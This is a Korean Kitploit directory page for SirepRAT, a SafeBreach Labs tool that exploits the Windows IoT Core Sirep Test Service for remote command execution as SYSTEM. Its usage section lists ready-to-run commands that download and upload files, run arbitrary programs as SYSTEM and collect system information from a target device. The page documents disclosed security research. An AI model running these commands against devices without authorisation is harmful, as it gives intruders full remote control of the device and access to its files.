Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SirepRAT — Windows IoT Core에서 SYSTEM 권한으로 원격 명령 실행 (Python2.7 및 Python3용 릴리스 제공) | Kitploit
도구/GitHubGitHub/safebreach-labs/sireprat
IoT SecurityExploitationPost-ExploitationPenetration TestingCommand and ControlRemote Access ToolPayload Development
GitHubsafebreach-labs/sireprat

SirepRAT

Windows IoT Core에서 SYSTEM 권한으로 원격 명령 실행 (Python2.7 및 Python3용 릴리스 제공)

저장소 보기
388915년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SirepRAT

SirepRAT - Windows IoT Core에서 SYSTEM 권한으로 RCE

SirepRAT는 대상에 실제 RAT 악성코드를 작성할 필요 없이 완전한 RAT 기능을 제공합니다.

배경

이 방법은 Microsoft 사이트에서 제공하는 공식 이미지에 내장되어 실행 중인 Sirep Test Service를 악용하는 것입니다. 이 서비스는 IoT 장치에서 드라이버/하드웨어 테스트를 수행하기 위해 구축할 수 있는 HLK 설정의 클라이언트 부분입니다. Sirep/WPCon/TShell 프로토콜을 제공합니다.

우리는 Sirep/WPCon 프로토콜을 분석하고, 이 프로토콜이 공격자에게 원격 명령 인터페이스를 노출시키는 방법을 보여주었습니다. 여기에는 임의의 위치에 파일을 가져오거나 넣기(get/put), 시스템 정보 획득과 같은 RAT 기능이 포함됩니다.

서비스와 프로토콜에 대한 연구에서 얻은 결과를 바탕으로, 지원되는 다양한 명령을 사용하여 이를 악용할 수 있는 간단한 파이썬 도구를 만들었습니다. 우리는 이를 SirepRAT라고 명명했습니다.

Windows IoT Core 대상에 명령을 보내기 위한 쉽고 직관적인 사용자 인터페이스를 제공합니다. 공식 Microsoft 이미지가 설치된 케이블 연결 Windows IoT Core 장치에서 작동합니다.

슬라이드 및 백서

슬라이드 및 연구 백서는 docs 폴더에 있습니다.

설정

root@kitploit:~
pip install -r requirements.txt

사용법

파일 다운로드

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

파일 업로드

root@kitploit:~
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

임의 프로그램 실행

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

인수와 함께 현재 로그온한 사용자로 가장:

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

( as_logged_on_user 플래그 없이 실행해 보면 SYSTEM 실행 기능을 확인할 수 있습니다)

시스템 정보 가져오기

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

파일 정보 가져오기

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

전체 세부사항은 도움말 참조:

root@kitploit:~
python SirepRAT.py --help

저자

Dor Azouri (@bemikre)

기여자

movatica (@movatica) - 파이썬 3로 포팅! (2020년 마감 직전에)

라이선스

BSD 3 - "New" 또는 "Revised" 조항

도구 다운로드